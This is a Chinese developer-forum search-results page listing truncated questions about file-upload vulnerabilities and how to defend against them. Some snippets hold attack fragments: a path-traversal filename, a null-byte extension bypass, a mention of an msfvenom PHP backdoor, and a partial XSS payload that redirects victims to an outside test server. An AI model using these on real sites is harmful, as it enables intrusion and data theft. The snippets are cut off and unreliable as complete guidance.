腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
搜索
搜索
关闭
发布
搜索
关闭
文章
问答
(9999+)
视频
开发者手册
清单
用户
专栏
沙龙
全部问答
原创问答
Stack Exchange问答
更多筛选
回答情况:
全部
有回答
回答已采纳
提问时间:
不限
一周内
一月内
三月内
一年内
问题标签:
未找到与 相关的标签
筛选
重置
1
回答
路径遍历,
文件
上传
漏洞
利用
我有一个大学的作业,我必须
上传
一个
文件
到任意位置。从代码中,我可以看到
上传
的
文件
存储在unix系统的临时
文件
夹+
文件
名中。这意味着,如果我可以将
文件
名作为/../../home/main.c发送给服务器(java),我就可以将该
文件
存储在系统上的任何位置。在不包括此选项的
文件
名中插入一个正斜杠字符是不可能的,因此唯一的方法就是以某种方式欺骗web客户端手动发送
文件
名。 这是可能
浏览 0
修改于2014-08-17
得票数 0
1
回答
存储XSS + PHP后门+
文件
上传
漏洞
我构建了这个web应用程序(使用PHP5+ MySQL),可以利用
文件
上传
漏洞
和XSS。
上传
我用msfvenom构建的PHP后门 转到另一个具有XSS
漏洞
的页面。
浏览 0
修改于2019-07-19
得票数 4
回答已采纳
1
回答
文件
上传
漏洞
:重命名解决方案?
我有一个模块,用户可以
上传
图片。 检查
文件
扩展名mypicture.php%00.jpg (仍然易受攻击)我的问题是: 在我采取这些预防措施之后,还有没有办法
上传
shell
文件
?
浏览 0
修改于2012-11-06
得票数 2
2
回答
无限制
文件
上传
漏洞
,有解决方案吗?
我有一个模块,用户可以
上传
图片。所以我运行了一些测试,通过篡改数据,我可以将它从.png更改为.php,它将成功地
上传
到我的服务器上,但是如果我到了那个位置,它看起来就“找不到”了。
浏览 0
提问于2016-04-10
得票数 -1
1
回答
文件
上传
安全
漏洞
我的代码中有没有
文件
上传
的安全
漏洞
?我在我的服务器端使用apache。在php.ini
文件
中启用了
文件
上传
。 <?
浏览 5
修改于2012-08-01
得票数 0
回答已采纳
1
回答
multer的
上传
文件
漏洞
我正在使用multer在我的应用程序中
上传
文件
。我只想确认一下,是否存在
文件
易受攻击的风险?请发表意见。
浏览 19
修改于2019-12-27
得票数 4
1
回答
asp.net mvc
文件
上传
安全
漏洞
好了,除了检查
文件
类型和
文件
大小两个服务器端,我如何才能避免安全
漏洞
,在
上传
的
文件
,可能会危及我的系统(主要是从高级黑客)。这足够了吗?我不是在谈论任何特殊的场景,只是简单的
文件
上传
。
浏览 2
修改于2010-12-21
得票数 0
回答已采纳
1
回答
通过http协议
上传
文件
的netty
漏洞
当我使用HttpPostRequestDecoder帮助我接受通过HTTP.
上传
的
文件
时Content-Disposition: form-data; name = "file"; filename = "c73b1345ab18deeef6cdb220d62fc976
浏览 0
提问于2020-03-21
得票数 0
1
回答
如何在.NET中对
上传
的pdf
文件
进行
漏洞
扫描?
我正在开发一个现有的web应用程序,该应用程序接受PDF
文件
作为字节数组。从功能的角度来看,这工作得很好。由于
文件
上传
可能是一个安全问题,我想要分析我的
文件
的
漏洞
。一个著名的工具是,它也是。
浏览 0
提问于2020-12-21
得票数 0
1
回答
是否有权威的
漏洞
分类?
是否对
漏洞
进行了分类?但我没有找到权威的
漏洞
分类。在Web应用程序
漏洞
之下,应该有XSS/SSRF/XXE...。
浏览 0
修改于2020-09-09
得票数 0
回答已采纳
3
回答
不使用/利用
文件
名中的XSS
我试图利用
文件
上传
的
文件
名字段中的
漏洞
进行攻击。web应用程序无法正确验证
上传
文件
的
文件
名,因此存在存储的跨站点脚本
漏洞
。我的问题是,每当我试图重命名
文件
以包含类似于下面的有效负载时,我就不能在
文件
名中包括/。 document.location='http://my_test_server.com/bla.php?甚至有可能利用这个
漏洞
吗?
浏览 0
修改于2018-04-19
得票数 2
回答已采纳
2
回答
如何避免
文件
上传
函数中的路径或目录操作?
在我正在做的
文件
上传
功能中,一个重要的问题是我可以保存图像用户
上传
的路径。在下面的代码中,我已经在基于web的应用程序
文件
夹中指定了保存
上传
文件
的
文件
夹。我的指导员告诉我,在asp.net UploadFile控件的代码后面还有一个安全
漏洞
,我不知道为什么!= @"~\Images\"; string comPath = Server.MapPath(path + "\\" + FileUpload1.File
浏览 4
修改于2013-03-24
得票数 2
1
回答
通过EXIF注释
上传
.JPEG
文件
外壳程序
我最近遇到了这个咨询,我对这两个
漏洞
都感到有点困惑,特别是
文件
上传
漏洞
。我不明白如何实际利用这个条件(甚至是为什么它作为一个条件存在)。这个
漏洞
实际上是一个
漏洞
吗?或者,它只是一个PoC,显示您可以
上传
东西内部的东西(但实际上并不是利用它们)?
浏览 0
提问于2013-04-29
得票数 10
回答已采纳
1
回答
W3af vs手动渗透测试
与手动查找
漏洞
相比,w3af等工具在查找web应用程序
漏洞
方面的效率如何?他们是否能够找到OWASP前10名中的所有
漏洞
,如反射xss、持久xss、sqli、lfi/rfi和不受限制的
文件
上传
?还是会有一些
漏洞
从裂缝中掉下来,仍然没有被发现?
浏览 0
提问于2014-11-27
得票数 0
3
回答
W3af和自动
漏洞
扫描器与手动测试
与手动查找
漏洞
相比,像w3af这样的工具在查找web应用程序
漏洞
方面有多有效?他们是否能够从OWASP前10名中找到所有
漏洞
,如反射xss、持久xss、sqli、lfi/rfi和不受限制的
文件
上传
?还是会有一些
漏洞
从裂缝中掉下来,而仍未被发现?
浏览 0
修改于2018-04-09
得票数 3
2
回答
文件
上传
(哪种类型的
文件
)
当我学习关于
文件
上传
漏洞
的时候,一个问题浮现在我的脑海中。在搜索
文件
上载
漏洞
时使用哪种类型的
文件
?是否需要检测后端使用哪种编程语言?大多数示例中都使用Php扩展名
文件
。
浏览 0
修改于2022-05-17
得票数 1
1
回答
漏洞
,远程代码执行,利用代码
我想知道利用以下
漏洞
的代码。 这是uploading file普通
文件
上传
吗? 例如,下面的代码。
浏览 0
修改于2018-11-27
得票数 0
回答已采纳
2
回答
不受限制的
文件
上传
-可能的攻击
在IIS服务器+ MYSQL上进行渗透测试(练习)期间,我发现了一个不受限制的
文件
上载
漏洞
,我可以为此上载.php
文件
。因此,我尝试使用passthru或exec命令
上传
php,但我收到了著名的响应“无法分叉.”因为,据我所知,我
上传
文件
的
文件
夹具有某种安全保护,避免命令的执行。尽管如此,我还是
上传
了一个.php
文件
,以便使用fopen、fread等命令读取示例
文件
,并且我已经成功地完成了它。 因此,我的问题是:为了
浏览 0
修改于2013-12-18
得票数 3
5
回答
用php编辑
文件
的所有方法?(安全)
我的网站有一些严重的安全
漏洞
。在保护the服务器之后,我现在将保护我的php
文件
。 因此,我想知道由于我的php脚本中的
漏洞
,所有的方法都可能被用来
上传
或编辑php
文件
。
浏览 1
提问于2011-03-13
得票数 1
回答已采纳
4
回答
接受图片
上传
时的安全问题
除了所有HTTP
上传
的正常内容之外,接受图像
上传
时需要考虑的主要安全问题是什么?例如,我应该如何验证
上传
的图像实际上是一个有效的图像
文件
?在查看器中是否有任何已知的
漏洞
可被格式错误的图像
文件
利用,对于这些
文件
,我应该关注意外传递的
漏洞
?(快速搜索一下似乎显示IE5/6中曾经有过。)常见图像格式中有没有可能存在安全
漏洞
的神秘功能? 有没有处理这些问题的库?
浏览 3
提问于2009-09-28
得票数 8
回答已采纳
第 2 页
第 3 页
第 4 页
第 5 页
第 6 页
第 7 页
第 8 页
第 9 页
第 10 页
第 11 页
点击加载更多
领券